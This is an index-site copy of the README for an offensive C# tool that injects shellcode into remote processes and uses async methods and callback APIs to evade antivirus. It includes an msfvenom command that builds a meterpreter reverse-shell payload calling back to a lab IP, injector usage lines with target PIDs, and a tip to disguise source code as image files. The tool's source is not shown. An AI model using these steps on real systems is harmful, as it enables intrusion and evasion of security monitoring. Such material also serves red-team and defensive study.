An open API service indexing awesome lists of open source software.

https://github.com/damonmohammadbagher/nativepayload_tiacbt

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)
https://github.com/damonmohammadbagher/nativepayload_tiacbt

antivirus-evasion asynchronous asyncmethod bypass-antivirus callback-functions callbackfunction csharp meterpreter nativeapi pentest-tool pentesting red-teaming redteaming remote-thread-injection

Last synced: 17 days ago
JSON representation

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)

Awesome Lists containing this project

README

        

# NativePayload_TiACBT
NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)
-------------
Note: These C# Codes Tested by .Net Framework 3.5 or 4.0 & 4.5 only ;) & i will Publish Article for these codes soon , in these code we have Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique CBT, in these Codes We have "CreateRemoteThread or NtCreateThreadEx" BUT the goal is Changing Code Behavior for Calling API Functions (Remote Thread Injection only), as you can see in these Pictures With API Monitor tool you can see what happened step by step.

as you can see in the Picture3, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session ¯\_(ツ)_/¯

-------------------------

Article: Remote Thread Injection + C# Async Method + CallBack Functions Technique (Changing Code Behavior) => https://damonmohammadbagher.github.io/Posts/05may2021x.html

--------------------------------------------
C# Codes:
```diff
+ 1. NativePayload_TiACBT.cs
+ 2. NativePayload_TiACBT2.cs
```
you can upload your Code like "image/gif/png/jpeg" files instead "text" file, sometimes this is good idea to avoid using files directly as source code ;D , but still you need to upload source code with zip formats etc (with/without random pwd for each download) ;)

1. NativePayload_TiACBT.png
2. NativePayload_TiACBT2.png

--------------------------------------------

1. NativePayload_TiACBT.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA + EnumSystemLocalesA Native APIs)

Note: NativePayload_TiACBT will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread (all methods called via Async C# Method + Callback Functions ...)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_TiACBT.exe [mode 1,2] [TPID] [PAYLOAD]
example: NativePayload_TiACBT.exe 1 5930 "fc,48,00,87,00,...."
example: NativePayload_TiACBT.exe 2 5930 "fc,48,00,87,00,...."

![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/NativePayload_TiACBT.png)

-----------------------------------------------------------
2. NativePayload_TiACBT2.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA Native API)

Note: NativePayload_TiACBT2 will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx

Note: in this code Method1 (OpenProcess) will call Method2 (VirtualAllocEx) & Method2 Will Call Method3 (WriteProcessMemory) & Method3 Will call Method4 (NtCreateThreadEx) and all methods called via Async C# Method + Callback Functions ...

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_TiACBT2.exe [TPID] [PAYLOAD]
example: NativePayload_TiACBT2.exe 4386 "fc,48,00,87,00,...."

![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/NativePayload_TiACBT2.png)

--------------------------------------------
Note: as you can see in the Picture, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session ¯\_(ツ)_/¯

![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/AV.png)

--------------------------------------------